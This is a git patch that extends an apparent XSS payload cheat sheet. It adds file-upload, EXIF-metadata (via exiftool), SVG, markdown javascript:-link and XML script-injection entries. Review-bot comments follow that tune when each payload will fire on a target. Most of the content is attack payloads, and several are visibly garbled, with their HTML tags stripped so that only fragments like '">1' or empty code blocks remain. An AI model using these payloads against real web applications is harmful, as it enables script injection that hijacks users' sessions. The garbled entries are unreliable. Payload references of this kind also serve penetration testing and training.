From 95e59127c06dc2de9f87d935fd175a5bbf233239 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 1 Oct 2020 22:29:55 +0700 Subject: [PATCH] XSS [5] Add 5 XSS cheat sheet --- XSS.md | 37 ++++++++++++++++++++++++++++++++----- 1 file changed, 32 insertions(+), 5 deletions(-) diff --git a/XSS.md b/XSS.md index cfd5c5c..c9202b4 100644 --- a/XSS.md +++ b/XSS.md @@ -1,4 +1,4 @@ -# XSS Payloads +# XSS Cheat Sheet (Basic) 1. Basic payload ```html @@ -38,6 +38,7 @@ ``` 4. Add when the input inside or between opening/closing tags, tag can be , and any other HTML tags + ```html "> @@ -45,12 +46,12 @@ * Example source code ```html -1 +1 ``` * After input the payload ```html -">1 +">1 ``` 5. Use when input inside an attribute’s value of an HTML tag but > is filtered @@ -84,10 +85,11 @@ * After input the payload ```html alert(1)'; + var sitekey = ''; ``` +# XSS Cheat Sheet (Advanced) 7. Use when input lands in a script block, inside a string delimited value. ```html '-alert(1)-' @@ -244,4 +246,29 @@ ${alert(1)} ``` -*Will be updated again! +14. XSS in filename (File Upload) Use when uploaded filename is reflected somewhere in target page +``` +">.jpeg +``` + +15. XSS in metadata (File Upload) Use when uploaded metada is reflected somewhere in target page (using exiftool) +``` +$ exiftool -Artist='">' dapos.jpeg +``` + +16. XSS with SVG file (File Upload) +``` + +``` + +17. XSS via markdown +``` +[Click Me](javascript:alert('1')) +``` + +18. XSS in XML page +``` +alert(1) +``` +> Add a "-->" to payload if input lands in a comment section +> Add a "]]>" if input lands in a CDATA section
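Review bot: the hunk at @@ -38,6 inserts a stray blank line between the item 4 description ("Add when the input inside or between opening/closing tags ...") and its ```html fence; no other numbered item in the file has a blank line there, so either drop it or apply the same spacing to items 1 through 13 for consistency.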
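Review bot: in the hunk at @@ -84,10 the new `# XSS Cheat Sheet (Advanced)` heading sits directly on the line after the closing ``` of item 6's "After input the payload" block, with no blank line, and it cuts one continuous numbered list (1 to 6, then 7 onward) across two top-level headings; add a blank line before the heading and either restart numbering under it or demote it to a sub-heading. The added `var sitekey = '';` line also only appears in the "after input" block here, while the matching "Example source code" block for item 6 is outside the hunk; confirm it carries the same line so the before/after pair shows how `alert(1)';` closes the string and the original statement continues.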
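Review bot: in the hunk at @@ -244,4 "metada" in item 15 should be "metadata", and items 14, 15 and 18 run the usage sentence straight on from the title without punctuation ("XSS in filename (File Upload) Use when uploaded filename is reflected ..."), whereas earlier items keep the title and the "Use when ..." sentence apart; put the usage note on its own line like items 5 and 7. The five new fences are bare ``` while the rest of the file tags them ```html; tag them the same way (```html for 14, 16 and 18, ```bash for the exiftool command in 15, ```markdown for 17). Each new entry also needs the precondition under which the payload can work, since the "Use when" text is missing or incomplete: the item 14 filename containing `"`, `<` and `>` is only stored as-is where the target filesystem allows those characters (NTFS rejects `<`, `>` and `"`); the item 15 Artist tag only matters if the application parses and reflects EXIF metadata; the item 16 SVG only executes script when the upload is served inline with its own content type and opened directly, not when embedded through an `<img>` tag; the item 17 `javascript:` link only fires if the markdown renderer does not strip or neutralise that scheme. Dropping the unbalanced `*Will be updated again!` line is fine.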